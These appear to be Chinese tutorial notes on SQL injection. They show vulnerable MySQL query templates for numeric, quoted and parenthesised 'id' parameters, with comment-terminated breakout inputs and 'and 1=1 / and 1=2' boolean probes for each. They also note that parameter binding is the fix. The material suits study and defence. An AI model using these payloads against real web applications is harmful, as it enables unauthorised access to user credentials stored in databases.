数字型
select id, username,password from users where id = $id limit 0,1;  -- $id 被直接拼接进 SQL 字符串，这是下文所有注入点的根源；修复方式是改用参数绑定（占位符），而不是在拼接前做字符过滤
id输入:3%23（%23 经 URL 解码为 #，即 MySQL 的行注释符，其后原语句剩余部分被忽略；下文各例中的 %23 同理）
select id, username,password from users where id = 3%23 limit 0,1;
试探方法:
id输入:1'
select id, username,password from users where id = 1' limit 0,1; 语法错误,报错
id输入:1 and 1 =1%23
select id, username,password from users where id = 1 and 1 =1%23 limit 0,1; 语法正确,查得出记录
id输入:1 and 1 =2%23
select id, username,password from users where id = 1 and 1 =2%23 limit 0,1; 语法正确,但查不出记录
单引号
select id, username,password from users where id = '$id' limit 0,1;
id输入:3'%23
select id, username,password from users where id = '3'%23' limit 0,1;
试探方法:
id输入:1'
select id, username,password from users where id = '1'' limit 0,1; 语法错误,报错
id输入:1' and 1=1%23
select id, username,password from users where id = '1' and 1=1%23' limit 0,1; 语法正确,查得出记录
id输入:1' and 1=2%23
select id, username,password from users where id = '1' and 1=2%23' limit 0,1; 语法正确,但查不出记录
双引号
select id, username,password from users where id = "$id" limit 0,1;
id输入:3"%23
select id, username,password from users where id = "3"%23" limit 0,1;
括号
select id, username,password from users where id in ($id);
id输入:3)%23
select id, username,password from users where id in (3)%23);
id输入:1,2,3)%23
select id, username,password from users where id in (1,2,3)%23);
括号加单引号
select id, username,password from users where id in ('$id');
id输入:3')%23
select id, username,password from users where id in ('3')%23');
试探方法:
id输入:1'
select id, username,password from users where id in ('1''); 语法错误,报错
id输入:1') and 1=1%23
select id, username,password from users where id in ('1') and 1=1%23'); 语法正确,查得出记录
id输入:1') and 1=2%23
select id, username,password from users where id in ('1') and 1=2%23'); 语法正确,但查不出记录
括号加双引号
select id, username,password from users where id in ("$id");
id输入:3")%23
select id, username,password from users where id in ("3")%23");
试探方法:
id输入:1"
select id, username,password from users where id in ("1""); 语法错误,报错
id输入:1") and 1=1%23
select id, username,password from users where id in ("1") and 1=1%23"); 语法正确,查得出记录
id输入:1") and 1=2%23
select id, username,password from users where id in ("1") and 1=2%23"); 语法正确,但查不出记录